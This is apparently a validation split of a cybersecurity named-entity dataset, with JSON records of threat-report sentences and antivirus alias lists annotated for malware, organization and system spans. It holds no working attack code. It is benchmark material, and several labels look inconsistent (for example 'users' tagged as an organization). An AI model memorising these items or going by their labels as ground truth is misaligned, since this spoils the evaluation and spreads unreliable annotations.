{"text": "Check Point researchers have conducted a thorough investigation of the DiamondFox malware-as-a-service in collaboration with TerbiumLabs, a Dark Web Data Intelligence company.", "spans": {"Organization: Check Point researchers": [[0, 23]], "Malware: DiamondFox malware-as-a-service": [[71, 102]], "Organization: TerbiumLabs, a Dark Web Data Intelligence company.": [[125, 175]]}, "info": {"id": "cyner2_valid_001127", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojanspy.Klogger Troj.Spy.W32.Klogger.tn9g Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.PPFF-1848 Hacktool.Keylogger Win.Spyware.1752-2 Trojan-Spy.Win32.Klogger Trojan.Win32.Klog.dkjqot Trojan.Win32.A.Klogger.23552 Trojan.Klog.32786 BehavesLike.Win32.Sdbot.mm Win32.Outbreak TrojanDropper.Injector.aabu Trojan[Spy]/Win32.Klogger Trojan-Spy.Win32.Klogger Trojan/Win32.Swrort.C200048 TrojanSpy.Klogger Trj/Keylog.ES Win32/Spy.Klogger Win32.Trojan-spy.Klogger.Pbfr Win32/Trojan.54e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001128", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Powershell Win32.Trojan.WisdomEyes.16070401.9500.9609 Trojan.Win32.Z.Psdl.370688 Troj.W32.SchoolGirl.tnx1 Downloader.Betload.Win32.51 BehavesLike.Win32.Downloader.ft SCRIPT.PowerShell", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001129", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Backdoor.Trojan BehavesLike.Win32.RansomTescrypt.jc TrojanDownloader:Win32/Macup.A Trj/CI.A Win32/Trojan.b9d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001130", "source": "cyner2_valid"}}
{"text": "] com on port 22011 .", "spans": {}, "info": {"id": "cyner2_valid_001131", "source": "cyner2_valid"}}
{"text": "Distracted users mistyping the first n when accessing www.santanderempresarial.com.br are subject to banking credentials theft and a very convincing phone call from a pretended Santander's attendant.", "spans": {"Organization: users": [[11, 16]], "Organization: a pretended Santander's attendant.": [[165, 199]]}, "info": {"id": "cyner2_valid_001132", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.NumberNameHB.Fam.Worm Trojan.HideExec Troj.Clicker.W32.VB.lhyE not-a-virus:RiskTool.Win32.HideExec.r Riskware.Win32.HideExec.ewkvlv Trojan.Win32.Z.Spy.171696 Program.HiddenStart TR/Spy.CoinBit.VY Win32.Troj.Miner.i.kcloud TrojanDropper:Win32/MineBicoin.A not-a-virus:RiskTool.Win32.HideExec.r Trojan.Dropper Win32/Trojan.863", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001133", "source": "cyner2_valid"}}
{"text": "] com Backend server spy [ .", "spans": {}, "info": {"id": "cyner2_valid_001134", "source": "cyner2_valid"}}
{"text": "The following month , we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples .", "spans": {}, "info": {"id": "cyner2_valid_001137", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win.Trojan.MSShellcode-7 HEUR_PDFEXP.F", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001139", "source": "cyner2_valid"}}
{"text": "Anubis can completely hijack an Android mobile device , steal data , record phone calls , and even hold the device to ransom by encrypting the victim ’ s personal files .", "spans": {"Malware: Anubis": [[0, 6]], "System: Android": [[32, 39]]}, "info": {"id": "cyner2_valid_001140", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.HfsReno.B3AA Trojan.Win32.Crypted.csnsgk Trojan.Rodricter.69 BehavesLike.Win32.PUPXAX.ch Trojan.Razy.D3CCDD Trojan:Win32/Claretore.L", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001141", "source": "cyner2_valid"}}
{"text": "We believe this activity, which dates back to at least July 2017, was intended to target travelers to hotels throughout Europe and the Middle East.", "spans": {"Organization: travelers": [[89, 98]]}, "info": {"id": "cyner2_valid_001142", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.TakesoftC.Trojan Trojan/W32.Starter.49160.B Trojan.Win32.Starter!O Trojan.Kplo.S12777 Trojan/Starter.tt TSPY_STARTER_CD100003.RDXN Win32.Trojan.FakeMicro.d W32/Backdoor.HEKM-3098 W32.Ramnit.B Win32/Gamepass.PPO TSPY_STARTER_CD100003.RDXN Trojan.Win32.Starter.bwelm Trojan.Win32.Starter.65536.D Trojan.Starter.1551 Trojan.Starter.Win32.250 W32/Backdoor2.HIFX Trojan/Starter.fb TR/Starter.TT Trojan/Win32.Starter Trojan:Win32/Kplo.B Trojan/Win32.Starter.R1734 Trojan.Starter Trojan.Win32.FakeLpk.a Trojan.Starter!IXSYvr7pvbg Trojan.Win32.Starter", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001143", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.489 O97.Madeba.3874 VBA.Trojan.obfuscated.b VB:Trojan.Valyria.489 VB:Trojan.Valyria.489 Vb.Troj.Valyria!c VB:Trojan.Valyria.489 VB:Trojan.Valyria.489 VB:Trojan.Valyria.489 VB:Trojan.Valyria.489 Trojan.VB.Valyria Win32/Trojan.daf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001144", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojandownloader.Nekozillot Trojan.MSILPerseus.D21311 Trojan.Win32.MSILPerseus.exesfy TrojanDownloader:MSIL/Nekozillot.A!bit Trj/GdSda.A Win32/Trojan.2a8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001145", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.ForeverXA.Worm Trojan.Win32.Swisyn!O Trojan.Swisyn.Win32.22804 Trojan/Swisyn.bwfd Trojan.Razy.D162A Win32.Trojan.VB.kc W32.Gosys TROJ_SWISYN.SCX Win.Trojan.Kazy-1164 Trojan.Win32.Swisyn.bwfd Trojan.Win32.Swisyn.crsvjc Troj.W32.Swisyn.mzNn Trojan.MulDrop7.40720 BehavesLike.Win32.Swisyn.dm Trojan.Win32.VB Trojan/Swisyn.wjs Trojan.Win32.Vb Trojan.Win32.Swisyn.bwfd Trojan/Win32.Swisyn.R1452 MAS.Trojan.VB.01049 Win32.Trojan.Swisyn.Wsty W32/Swisyn.BNER!tr Win32/Trojan.d47", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001146", "source": "cyner2_valid"}}
{"text": "The third type of information will be sent when RuMMS intercepts any SMS messages , including the balance inquiry results when it contacts the SMS code of a particular financial service .", "spans": {"Malware: RuMMS": [[48, 53]]}, "info": {"id": "cyner2_valid_001147", "source": "cyner2_valid"}}
{"text": "2016 We do not know exactly how many people have been infected with RuMMS malware ; however , our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016 .", "spans": {"Malware: RuMMS": [[68, 73], [158, 163]]}, "info": {"id": "cyner2_valid_001148", "source": "cyner2_valid"}}
{"text": "This is a good example where two-factor authentication based on SMS would fail since the attacker can read the SMS .", "spans": {}, "info": {"id": "cyner2_valid_001149", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.BAT.Favadd!O Trojandropper.Favorcopy Trojan.BAT.Favadd.b Trojan.Win32.Qhost.cyikun BAT.S.Favadd.68096 Troj.BAT.Favadd.b!c Trojan.Win32.Favadd.a Worm.Win32.Autorun.dy02 Trojan.Favadd.201 W32/Trojan.UKLP-3332 Trojan/BAT.ax TrojanDropper:Win32/Favorcopy.A Trojan.BAT.Favadd.b Trojan/Win32.Favadd.R41157 Trojan.BAT.Favadd Trj/CI.A Win32/Trojan.ab8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001150", "source": "cyner2_valid"}}
{"text": "This is an area where virus writers are actively working , resulting in a large number of technological innovations .", "spans": {}, "info": {"id": "cyner2_valid_001151", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Small!O TjnDownldr.Tibs.S12839 Trojan.Dropper/Packed Win32.Trojan.WisdomEyes.16070401.9500.9984 TROJ_DLOADER.XJ Trojan-Downloader.Win32.Small.bon Trojan.Win32.Small.bpavrf Packer.W32.Tibs.l4Hz Trojan.DownLoader.2489 TROJ_DLOADER.XJ BehavesLike.Win32.Downloader.xc TrojanDownloader.Vxgame.q TrojanDownloader:Win32/Multi.B Trojan.Win32.A.Downloader.4605[FSG] Trojan-Downloader.Win32.Small.bon Trojan/Win32.Downloader.R38972 Trojan-Downloader.Revelation.Tibs.B RiskWare.Tool.CK Trojan-Downloader.Win32.Tibs", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001153", "source": "cyner2_valid"}}
{"text": "The other iOS app “ Concipit Shop ” from the same developer appeared normal and was last updated on November 2019 .", "spans": {"System: iOS": [[10, 13]]}, "info": {"id": "cyner2_valid_001154", "source": "cyner2_valid"}}
{"text": "On August 25, 2016, the Citizen Lab published a report showing that NSO's technology was used to target Ahmed Mansoor, a UAE-based human rights defender, as well as identifying targeting in Mexico.", "spans": {"Organization: the Citizen Lab": [[20, 35]], "Organization: Ahmed Mansoor,": [[104, 118]], "Organization: UAE-based human rights defender,": [[121, 153]]}, "info": {"id": "cyner2_valid_001155", "source": "cyner2_valid"}}
{"text": "Coming back to the execution flow , once the spyware hides itself , it starts an Android service named MainService .", "spans": {"System: Android": [[81, 88]]}, "info": {"id": "cyner2_valid_001157", "source": "cyner2_valid"}}
{"text": "Users looking forward to using the TikTok app amidst the ban might look for alternative methods to download the app .", "spans": {"System: TikTok": [[35, 41]]}, "info": {"id": "cyner2_valid_001158", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Adware.SMSHoax.Win32.45 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.Inject.aiecb Trojan.Win32.Inject.evxrvf Hoax.W32.ArchSMS.mB2T Trojan.DownLoad3.49527 BehavesLike.Win32.BadFile.wm Trojan.Inject.adde Trojan:Win32/Zonsterarch.BW Adware.SMSHoax.6 Trojan.Win32.Inject.aiecb PUP/Win32.InstMonster.R215348 Adware.InstallMonster Trojan.Inject!lYnrTmkmtHE AdWare.InstMonster", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001159", "source": "cyner2_valid"}}
{"text": "It tries to steal victims' banking credentials and credit card information via phishing pages crafted to mimic Google Play's payment interface as well as the login pages of 7 different banks' apps.", "spans": {"System: Google Play's payment interface": [[111, 142]]}, "info": {"id": "cyner2_valid_001160", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.DownloadRecslurpG.Trojan TrojanDownloader.Recslurp Trojan.MalPack BKDR_MATSNU.SM0 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.SEQE-1842 BKDR_MATSNU.SM0 Trojan.Win32.Recslurp.dsjyyo Trojan.Win32.Z.Recslurp.73728 Trojan.Proxy.27552 Trojan.Recslurp.Win32.1 BehavesLike.Win32.Madangel.lh W32/Trojan2.OUIQ Trojan/Recslurp.b TR/Crypt.ZPACK.kabym TrojanDownloader:Win32/Recslurp.E Trojan/Win32.Inject.R151698 Trojan.Recslurp Trj/CI.A W32/Kryptik.DZVG!tr Win32/Trojan.980", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001162", "source": "cyner2_valid"}}
{"text": "Ginning the ratings FURTHER READING 1 million Google accounts compromised by Android malware called Gooligan To implement the VM feature , the malicious APK installation dropper used by HummingWhale uses DroidPlugin , an extension originally developed by developers from China-based company Qihoo 360 , Check Point said .", "spans": {"Organization: Google": [[46, 52]], "System: Android": [[77, 84]], "Malware: Gooligan": [[100, 108]], "Malware: HummingWhale": [[186, 198]], "Malware: DroidPlugin": [[204, 215]], "Organization: Qihoo 360": [[291, 300]], "Organization: Check Point": [[303, 314]]}, "info": {"id": "cyner2_valid_001163", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.FakeAlert Win32.Trojan.WisdomEyes.16070401.9500.9800 W32/Trojan.HIMV-8652 Troj.W32.Inject.tnKf BehavesLike.Win32.Downloader.lh Trojan.HTML.FakeAlert TrojanDownloader.Paph.ds TR/AD.Bosoda.mysge Trojan[Downloader]/Win32.Betload Trojan.Jaiko.D1041 Joke:BAT/Bosoda.A Trojan.FakeAlert Trj/CI.A HTML/FakeAlert.AF Win32.Trojan.Crypt.Wptb", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001164", "source": "cyner2_valid"}}
{"text": "On May 6 and May 11, 2015, Unit 42 observed two targeted attacks, the first against the U.S. government and the second on a European media company.", "spans": {"Organization: Unit 42": [[27, 34]], "Organization: U.S. government": [[88, 103]], "Organization: European media company.": [[124, 147]]}, "info": {"id": "cyner2_valid_001165", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.ActogarLTAI.Trojan Trojan.Zbot Trojan.IRCBot.Win32.7789 Trojan/AutoRun.IRCBot.jd Win32.Trojan.WisdomEyes.16070401.9500.9987 W32.IRCBot TROJ_HPCRYPCTB.SMR Trojan.Win32.Androm.dyglia TROJ_HPCRYPCTB.SMR BehavesLike.Win32.PWSZbot.dc W32/Trojan.JJZL-1655 Trojan.Blocker.wv TR/Crypt.ZPACK.utcuw Trojan[Downloader]/Win32.Dofoil Trojan.Zbot.191 Trojan/Win32.Miuref.R167036 Trojan.Diple Win32/AutoRun.IRCBot.JD Trojan.IRCbot!qGVCqAdzAoo Trojan.Win32.Boaxxe W32/Injector.CLNV!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001166", "source": "cyner2_valid"}}
{"text": "Overall in 2012-2013 we detected approximately 10,000,000 unique malicious installation packages : Different installation packages can install programs with the same functionality that differ only in terms of the malicious app interface and , for instance , the content of the text messages it spreads .", "spans": {}, "info": {"id": "cyner2_valid_001167", "source": "cyner2_valid"}}
{"text": "Trend Micro presents a case study of the cyberespionage efforts by Earth Preta.", "spans": {"Organization: Trend Micro": [[0, 11]]}, "info": {"id": "cyner2_valid_001168", "source": "cyner2_valid"}}
{"text": "We have collected numerous samples spanning from 2016 to early 2019 .", "spans": {}, "info": {"id": "cyner2_valid_001169", "source": "cyner2_valid"}}
{"text": "One of the hardest things to do when you are receiving malware that have anonymized e.g. name-is-hash names or general samples that lack any indication of the infection vector is to determine the origin of the file and its intended target.", "spans": {}, "info": {"id": "cyner2_valid_001171", "source": "cyner2_valid"}}
{"text": "It also attempts to srpead using the EternalBlue and EternalRomance SMBv1 exploits.", "spans": {"Malware: EternalBlue": [[37, 48]], "Malware: EternalRomance SMBv1 exploits.": [[53, 83]]}, "info": {"id": "cyner2_valid_001172", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.HackTool.7168.D Trojan/Hacktool.Xhack.01.b Win32/HackTool.XHack.01.B TROJ_XHACK.B HackTool.Win32.Xhack.01.b Riskware.Win32.Xhack-01.unxw HackTool.Xhack.7168[h] TrojWare.Win32.HackTool.XHack.B Tool.Xhack Tool.Xhack.Win32.2 TROJ_XHACK.B BehavesLike.Win32.TibsPacked.zc W32/Tool.WANC-2640 Hacktool.XHack.01.b SPR/xHack.01.B HackTool/Win32.Xhack HackTool.W32.Xhack.01.b!c Win-Trojan/Xhack.7168 HackTool:Win32/Xhack.B Win32.Hacktool.Xhack.Akyz HackTool.Win32.Xhack HackTool.ACAG Hacktool.Win32.Xhack.01 Win32/Trojan.Hacktool.cc1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001173", "source": "cyner2_valid"}}
{"text": "A backdoor targetting Linux also known as: Backdoor.Linux.Mirai.B Backdoor.LuaBot.Linux.11 Backdoor.Linux.Luabot!c Linux.Iotreaper Linux/Iotreaper.A ELF_IOTREAPER.A Unix.Trojan.IoTReaper-6355327-0 HEUR:Backdoor.Linux.LuaBot.b Trojan.LuaBot.eulikp Linux.IotReaper.10 ELF_IOTREAPER.A ELF/Trojan.CQZK-6 Backdoor.Linux.aeup LINUX/Luabot.lvmpq Linux/Luabot.A!tr.bdr Trojan[Backdoor]/Linux.LuaBot.b Linux.S.Reaper.862672 HEUR:Backdoor.Linux.LuaBot.b Linux/Luabot.862672 Trojan.Linux.IotReaper Linux.Backdoor.Luabot.Taoo Trojan.Linux.Iotreaper", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001174", "source": "cyner2_valid"}}
{"text": "The attack four years ago resulted in 30,000 or more systems being damaged.", "spans": {"System: systems": [[53, 60]]}, "info": {"id": "cyner2_valid_001175", "source": "cyner2_valid"}}
{"text": "Compared to other ransomware such as Cerber, whose developers earn 40% in commissions, Encryptor RaaS has a more attractive proposition.", "spans": {"Malware: ransomware": [[18, 28]], "Malware: Cerber,": [[37, 44]], "Malware: Encryptor RaaS": [[87, 101]]}, "info": {"id": "cyner2_valid_001176", "source": "cyner2_valid"}}
{"text": "We believe this to be the largest known Apple account theft caused by malware.", "spans": {"System: Apple account": [[40, 53]], "Malware: malware.": [[70, 78]]}, "info": {"id": "cyner2_valid_001177", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Worm.Socks.A Worm.Win32.Socks!O Win32.Worm.Socks.A Worm.Socks.Win32.466 W32/Socks.at Win32.Worm.Socks.A WORM_SOCKS.DZ Win32.Trojan-Downloader.Small.g W32/Worm.XEH W32.Mandaph Win32/Ruternam.DD WORM_SOCKS.DZ Win.Worm.Socks-22 SScope.Worm.Socks.afv Worm.Win32.Socks.at Trojan.Win32.Socks.bgabja Worm.Win32.A.Socks.77757 W32.W.Socks.l03A Win32.Worm.Socks.A Trojan.DownLoader8.12758 BehavesLike.Win32.VirRansom.cc W32/Worm.CUZR-8725 TrojanDownloader.Small.sui Worm/Win32.Socks Worm:Win32/Figload.A Win32.Worm.Socks.A Worm.Socks Worm.Win32.Socks.at Win32.Worm.Socks.A Worm/Win32.Socks.R51740 W32/Socks.a Win32.Worm.Socks.A Win32/TrojanDownloader.Small.OBD Worm.Socks!5J3YF194TfI W32/PackZbot.AFG!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001178", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Dropped:Trojan.Dropper.TTW TrojanDropper.Crenufs.AA3 TROJ_DROPPR.SMAB Win32/Dropper.KI TROJ_DROPPR.SMAB Win.Trojan.Dropper-4236 Dropped:Trojan.Dropper.TTW Trojan.Win32.Drop.bsjju Dropped:Trojan.Dropper.TTW Backdoor.Win32.Poison.HMN Trojan.DownLoader3.58740 BehavesLike.Win32.RAHack.ch TrojanDropper.StartPage.kf TrojanDropper:Win32/Crenufs.A Trojan.Dropper.TTW Dropper.StartPage.151552 Dropped:Trojan.Dropper.TTW Dropper/Win32.StartPage.R7795 Dropped:Trojan.Dropper.TTW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001179", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Worm.Kolab.BX Worm/W32.Kolab.196608.Z Worm.Krap Trojan/AutoRun.IRCBot.gq TROJ_INJECT.JIL Win32.Virus.Krap.a W32/Trojan2.NSDN Win32/Tnega.ALDW TROJ_INJECT.JIL Win.Trojan.Zbot-44769 Win32.Worm.Kolab.BX Virus.Win32.Krap.it Win32.Worm.Kolab.BX Trojan.Win32.SmsSend.cbobaq Worm.Win32.A.Net-Kolab.196608.H Virus.W32.Krap!c Win32.Worm.Kolab.BX ApplicUnwnt.Win32.Hoax.ArchSMS.SG Win32.Worm.Kolab.BX Trojan.PWS.Panda.547 Worm.Kolab.Win32.11974 BehavesLike.Win32.ZBot.ch W32/Trojan.VOEZ-7948 TrojanDropper.Daws.aeg W32.Infostealer.Zeus WORM/IrcBot.ED Win32.Worm.Kolab.BX Virus.Win32.Krap.it Trojan:Win32/Kanots.A Trojan/Win32.Zbot.R22644 BScope.Hoax.ArchSMS.2231 Trj/Pacrypt.D Trojan.Kolab Win32/AutoRun.IRCBot.GQ Worm.AutoRun!j45RyJLdJEk W32/Zbot.EQPB!tr Win32/Worm.ab1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001180", "source": "cyner2_valid"}}
{"text": "I previously associated Adwind with targeted phishing attempts in limited amounts.", "spans": {"Malware: Adwind": [[24, 30]]}, "info": {"id": "cyner2_valid_001181", "source": "cyner2_valid"}}
{"text": "Add to this a ransom of 1.79 Bitcoins approximately $3,300 at the time of the campaign and the potential value of the campaign is significant.", "spans": {}, "info": {"id": "cyner2_valid_001182", "source": "cyner2_valid"}}
{"text": "MainService is the central controller of this spyware .", "spans": {}, "info": {"id": "cyner2_valid_001184", "source": "cyner2_valid"}}
{"text": "State Machines Since various carriers implement the billing process differently , Bread has developed several variants containing generalized state machines implementing all possible steps .", "spans": {"Malware: Bread": [[82, 87]]}, "info": {"id": "cyner2_valid_001185", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.DownLoad3.15790 Trojan-Downloader.Win32.Injecter", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001186", "source": "cyner2_valid"}}
{"text": "Sending C2-specified SMS messages to phone numbers in the victim ’ s contacts .", "spans": {}, "info": {"id": "cyner2_valid_001188", "source": "cyner2_valid"}}
{"text": "Observe and look at the app ’ s display and text , stated functions , reviews from other users , and requested permissions before downloading .", "spans": {}, "info": {"id": "cyner2_valid_001189", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W97M.Downloader.BRA O97M.Dropper.XA W97M/Downloader.bbl W97M.Downloader.BRA W2KM_DRIDEX.YYSUN W97M.Downloader.BRA W97M.Downloader.BRA W97M.DownLoader.990 W2KM_DRIDEX.YYSUN W97M/Downloader.bbl HEUR.VBA.Trojan.e TrojanDropper:O97M/Vibro.A W97M.Downloader.BRA W97M.Downloader.BRA virus.office.obfuscated.4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001190", "source": "cyner2_valid"}}
{"text": "On January 25, 2017, the criminal syndicate behind Dridex launched another small campaign targeting UK financial institutions.", "spans": {"Malware: Dridex": [[51, 57]], "Organization: financial institutions.": [[103, 126]]}, "info": {"id": "cyner2_valid_001191", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.GameHack BehavesLike.Win32.BadFile.mz Trojan.Win32.GameHack Trojan:Win32/GameHack.C", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001192", "source": "cyner2_valid"}}
{"text": "We named this campaign “ Bouncing Golf ” based on the malware ’ s code in the package named “ golf. ” The malware involved , which Trend Micro detects as AndroidOS_GolfSpy.HRX , is notable for its wide range of cyberespionage capabilities .", "spans": {"Malware: Bouncing Golf": [[25, 38]], "Organization: Trend Micro": [[131, 142]], "Malware: AndroidOS_GolfSpy.HRX": [[154, 175]]}, "info": {"id": "cyner2_valid_001193", "source": "cyner2_valid"}}
{"text": "This RAT is marketed as an undetectable Java RAT.", "spans": {"Malware: RAT": [[5, 8]], "System: Java": [[40, 44]], "Malware: RAT.": [[45, 49]]}, "info": {"id": "cyner2_valid_001194", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Win32.Trojan.WisdomEyes.16070401.9500.9970 Trojan-Ransom.Win32.HmBlocker.bdg Trojan.Win32.Winlock.bsinq TrojWare.Win32.Trojan.Ransom.~H Trojan.MulDrop.65298 BehavesLike.Win32.SoftPulse.qc Trojan/HmBlocker.wf TrojanDropper:Win32/Wlock.A Trojan-Ransom.Win32.HmBlocker.bdg Hoax.HmBlocker Trojan-Ransom.Win32.HmBlocker", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001195", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.DownloadSuleeLnr.Trojan Trojan/W32.Small.32768.AGT Downldr.Sulee.S235944 Win32.Trojan.WisdomEyes.16070401.9500.9947 Win32/Small.AEC Worm.Win32.Deborm.pgc Trojan.Win32.Dwn.bzwwu Trojan.Win32.Downloader.32768.PG Troj.Downloader.W32.Small.ljQA Win32.Worm.Deborm.Plkj Trojan.DownLoader9.55489 Trojan-Downloader.Win32.Small TR/Dldr.Sulee.B TrojanDownloader:Win32/Sulee.A Worm.Win32.Deborm.pgc Downloader/Win32.Small.R24462 Worm.Deborm Win32/Trojan.Downloader.9f6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001196", "source": "cyner2_valid"}}
{"text": "An Android backdoor also known as: OSX/SabPub.A MAC.OSX.Trojan.Lamadai.B Backdoor.MacOSX.SabPab.A MAC.OSX.Trojan.Lamadai.B Backdoor.SabPub.OSX.2 OSX.Sabpab OSX_SABPAB.A Win.Trojan.SubPub-1 MAC.OSX.Trojan.Lamadai.B Backdoor.OSX.SabPub.a MAC.OSX.Trojan.Lamadai.B Trojan.Mac.Sabpub.pxvaq OSX.S.Sabpab.42556 MAC.OSX.Trojan.Lamadai.B Backdoor:OSX/Sabpab.A BackDoor.Sabpub.1 OSX_SABPAB.A OSX/FlashFake.g Backdoor/OSXSabPub.a OSX/SabPab.A MAC.OSX.Trojan.Lamadai.B Backdoor.OSX.SabPub.a!c Backdoor.OSX.SabPub.a Backdoor:MacOS_X/SabPab.A OSX32-Trojan/Sabpub.B OSX/FlashFake.g Win32.Backdoor.Sabpub.ynw Backdoor.OSX.SabPub OSX/SabPub.A!tr.bdr Win32/Backdoor.3ab", "spans": {"Malware: backdoor": [[11, 19]]}, "info": {"id": "cyner2_valid_001197", "source": "cyner2_valid"}}
{"text": "FF-RAT is a family of malware used in a number of targeted attacks over at least the last five years.", "spans": {"Malware: FF-RAT": [[0, 6]], "Malware: family of malware": [[12, 29]]}, "info": {"id": "cyner2_valid_001198", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.DarkKomet Win32.Trojan.WisdomEyes.16070401.9500.9968 W32/Trojan.KWPG-7705 Backdoor.Win32.DarkKomet.hukx Trojan.Win32.Inject.dchfem Backdoor.W32.Darkkomet!c Win32.Backdoor.Darkkomet.Lmay Trojan.DownLoader7.8295 BehavesLike.Win32.Trojan.vc Trojan/Windef.ey Trojan[Backdoor]/Win32.DarkKomet Backdoor.Win32.DarkKomet.hukx Trojan:MSIL/Dobrun.A Trojan.MSIL.Injector MSIL/Injector.TEX!tr Trj/CI.A Win32/Trojan.fac", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001200", "source": "cyner2_valid"}}
{"text": "Proofpoint researchers recently observed a novel targeted phishing attack that combined Outlook Web Access OWA credential phishing with a malicious document download.", "spans": {"Organization: Proofpoint researchers": [[0, 22]], "System: Outlook Web Access OWA": [[88, 110]]}, "info": {"id": "cyner2_valid_001201", "source": "cyner2_valid"}}
{"text": "In this case , FrozenCell has primarily netted the actors behind it with recorded outbound calls followed closely by images and recorded incoming calls .", "spans": {"Malware: FrozenCell": [[15, 25]]}, "info": {"id": "cyner2_valid_001202", "source": "cyner2_valid"}}
{"text": "The malware code is complicated, busy, and fairly obfuscated–there are no Windows API calls or obvious strings.", "spans": {"Malware: malware code": [[4, 16]], "System: Windows API calls": [[74, 91]]}, "info": {"id": "cyner2_valid_001203", "source": "cyner2_valid"}}
{"text": "The customer has given us approval to share some of the details about the Spyware app that Skycure discovered.", "spans": {"Organization: customer": [[4, 12]], "Malware: Spyware app": [[74, 85]], "Organization: Skycure": [[91, 98]]}, "info": {"id": "cyner2_valid_001204", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.RingZero RingZero.Trojan Win.Trojan.Ring0-1 Trojan.RingZero Trojan-PSW.Win32.Ring0.e Trojan.RingZero Trojan.Win9x.Ring0.hvgs Troj.Psw.W32!c Win32.Trojan-qqpass.Qqrob.Lqyo Trojan.RingZero Trojan.RingZero Trojan.Eps.165 Trojan/PSW.Ring0.b TR/PSW.Ring0 Trojan.RingZero Trojan-PSW.Win32.Ring0.e PWS:Win32/Ring0.B Win-Trojan/RingZero.5704 Trojan.RingZero Trojan-Spy.Ring0 Win32/Trojan.PSW.03d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001205", "source": "cyner2_valid"}}
{"text": "While the counterfeit games claim to provide similar functionality to the popular apps , they are simply used to display ads through a custom advertisement SDK .", "spans": {}, "info": {"id": "cyner2_valid_001206", "source": "cyner2_valid"}}
{"text": "This Pulse includes indicators extended from Alienvault Labs Intelligence", "spans": {"Organization: Pulse": [[5, 10]], "Organization: Alienvault Labs Intelligence": [[45, 73]]}, "info": {"id": "cyner2_valid_001207", "source": "cyner2_valid"}}
{"text": "The malware copies itself onto removable drives to infect other machines.", "spans": {"Malware: malware": [[4, 11]], "System: removable drives": [[31, 47]], "System: machines.": [[64, 73]]}, "info": {"id": "cyner2_valid_001208", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Script Trojan.Win64.Click3.ewpadq Trojan.Click3.23647 Trojan.Atros5 W64/Trojan.CDCY-4984 Trojan.BetKrypt.c TrojanDownloader:PowerShell/Plasti.A Trj/CI.A Win32/Trojan.Downloader.036", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001209", "source": "cyner2_valid"}}
